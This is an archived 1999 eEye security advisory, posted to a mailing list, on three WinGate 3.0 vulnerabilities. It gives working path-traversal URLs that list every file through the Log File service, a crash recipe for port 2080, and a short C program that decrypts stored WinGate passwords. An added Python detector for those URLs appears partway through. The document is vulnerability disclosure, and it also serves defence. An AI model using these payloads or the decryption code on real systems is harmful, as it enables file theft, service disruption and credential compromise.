Multiple WinGate Vulnerabilities [Tad late]

From: Marc (Marcat_private)
Date: Mon Apr 05 1999 - 17:52:51 PDT

    At first we were just going to post this advisory to our website but after
    the subject came up on the NTSEC list and we got a few emails telling us to
    post it to the other lists... well here it is.
    
    Signed,
    Marc
    eEye Digital Security Team
    http://www.eEye.com
    
    P.S.
    Go see Matrix.
    
    ________________________________________________________________________
    
    eEye Digital Security Team <e>
    www.eEye.com
    infoat_private
    February 22, 1999
    ________________________________________________________________________
    
    Multiple WinGate Vulnerabilities
    
    Systems Affected
    WinGate 3.0
    
    Release Date
    February 22, 1999
    
    Advisory Code
    AD02221999
    
    ________________________________________________________________________
    
    Description:
    ________________________________________________________________________
    
    WinGate 3.0 has three vulnerabilities:
    1. Read any file on the remote system.
    2. DoS the WinGate service.
    3. Decrypt WinGate passwords.
    
    ________________________________________________________________________
    
    Read any file on the remote system
    ________________________________________________________________________
    
    We were debating if we should add this to the advisory or not. We
    figured it would not hurt so here it is.
    The WinGate Log File service in the past has had holes where you can
    read any file on the system, and the holes still seem to be there and
    some new ways of doing it have cropped up.
    
    http://www.server.com:8010/c:/ - NT/Win9x
    http://www.server.com:8010// - NT/Win9x
    http://www.server.com:8010/..../ - Win9x
    
    Each of the above URLs will list all files on the remote machine.
    There are a few reasons why we were not sure if we were going to post
    this information.
    
    By default all WinGate services are set so that only 127.0.0.1
    can use the service. However, the use for the log file service is to let
    users remotely view the logs, so chances are people using the log file
    service are not going to be leaving it on 127.0.0.1. Also, by default in the
    WinGate settings "Browse" is enabled. We are not sure if the developers
    intended the Browse option to mean the whole hard drive. We would hope
    not.
    
    The main reason we did put this in the advisory is the fact that
    the average person using WinGate (Cable Modem Users etc..) is not the
    brightest of people and will open the Log Service so that everyone
    has access to it. We understand there are papers out there saying not
    to do this and even the program itself says not to, but the average
    person will not let this register in their head as a bad thing, so the
    software should at least make it as secure as possible. Letting people
    read any file is not living up to that standard. Anyway, let's move on...
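Added example, not part of the eEye advisory: a small detector that flags requests to the Log File service port (8010) whose path takes one of the forms listed above. The log lines and their "client method url" layout are constructed for this example (the advisory does not show WinGate's own log format); the patterns generalise slightly beyond the three literal URLs to any drive letter, any empty path segment and any run of two or more dots.

```python
import re
from urllib.parse import urlsplit

# Constructed sample records in an assumed "<client> <method> <url>" layout.
SAMPLE_LOG = """\
10.0.0.5 GET http://www.server.com:8010/
10.0.0.5 GET http://www.server.com:8010/c:/
192.168.1.9 GET http://www.server.com:8010//
192.168.1.9 GET http://www.server.com:8010/..../
10.0.0.7 GET http://www.server.com:8010/wingate.log
10.0.0.7 GET http://www.server.com:8080/index.html
"""

LOG_SERVICE_PORT = 8010  # WinGate Log File service port from the advisory

# Path shapes the advisory says escape the log directory, slightly generalised.
SUSPICIOUS_PATHS = (
    ("drive-letter path", re.compile(r"^/[A-Za-z]:/")),   # /c:/
    ("empty path segment", re.compile(r"//")),            # //
    ("dot-run segment", re.compile(r"/\.{2,}(/|$)")),     # /..../ or /../
)


def flag_request(line):
    """Return (client, path, reason) when a request hits the log service
    with a suspicious path, otherwise None."""
    fields = line.split()
    if len(fields) != 3:
        return None
    client, _method, url = fields
    parts = urlsplit(url)
    if parts.port != LOG_SERVICE_PORT:
        return None  # other services are out of scope for this check
    for reason, pattern in SUSPICIOUS_PATHS:
        if pattern.search(parts.path):
            return (client, parts.path, reason)
    return None


def scan_log(text):
    """Run flag_request over every line and keep only the hits."""
    return [hit for hit in map(flag_request, text.splitlines()) if hit]


if __name__ == "__main__":
    for client, path, reason in scan_log(SAMPLE_LOG):
        print(f"{client} requested {path!r} on the log service: {reason}")
```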
    ________________________________________________________________________
    
    DoS the WinGate Service
    ________________________________________________________________________
    
    The Winsock Redirector Service sits on port 2080. When you connect to it,
    send 2000 characters and disconnect, it will crash all WinGate
    services. O Yippee
    
    ________________________________________________________________________
    
    Decrypt the WinGate passwords
    ________________________________________________________________________
    
    The registry keys where WinGate stores its passwords are insecure and
    let everyone read them. Therefore anyone can get the passwords and
    decrypt them. Code follows.
    
    ________________________________________________________________________
    
    // ChrisAat_private
    // Mikeat_private
    //
    // WinGate "encrypts" a stored password by XORing each byte with a value
    // that depends only on its position: byte i (0-based) is XORed with
    // (i + 1) << 1. XOR is its own inverse, so feeding the stored value
    // through the same transform prints the plaintext.
    
    #include <stdio.h>
    #include <string.h>
    
    int main(int argc, char *argv[]) {
        size_t i;
    
        if (argc != 2) {
            fprintf(stderr, "usage: %s <stored-password>\n", argv[0]);
            return 1;
        }
    
        for (i = 0; i < strlen(argv[1]); i++)
            putchar(argv[1][i] ^ (char)((i + 1) << 1));
        putchar('\n');
        return 0;
    }
    ________________________________________________________________________
    
    You get the idea...
    
    It is good that WinGate 3.0 by default locks down all services to 127.0.0.1.
    However, there still seem to be holes where if one gets access to the
    WinGate service from a non-blocked IP, they can do some damage. Chances
    are if you poke hard at some of the other services you will find similar
    problems as above. Software developers need to remember that the avg. user
    is not always the brightest, so our products' security must be as tight as
    possible.
    
    ________________________________________________________________________
    
    Vendor Status
    ________________________________________________________________________
    
    Contacted a month or so ago, have heard nothing. Someone from the NTSEC
    list contacted eval-supportat_private with our findings and they were
    sent an email back rather quickly. We had sent our emails to
    supportat_private and things of the such. Maybe all three of our
    emails just got lost. The last we've heard WinGate is taking steps to fix
    the problem. Look for patches soon.
    
    ________________________________________________________________________
    
    Copyright (c) 1999 eEye Digital Security Team
    ________________________________________________________________________
    
    Permission is hereby granted for the redistribution of this alert
    electronically. It is not to be edited in any way without express consent of
    eEye. If you wish to reprint the whole or any part of this alert in any
    other medium excluding electronic medium, please e-mail alertat_private for
    permission.
    
    ________________________________________________________________________
    
    Disclaimer:
    ________________________________________________________________________
    
    The information within this paper may change without notice. Use of this
    information constitutes acceptance for use in an AS IS condition. There are
    NO warranties with regard to this information. In no event shall the author
    be liable for any damages whatsoever arising out of or in connection with
    the use or spread of this information. Any use of this information is at the
    user's own risk.
    
    Please send suggestions, updates, and comments to:
    eEye Digital Security Team
    infoat_private
    http://www.eEye.com
    
    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:41:33 PDT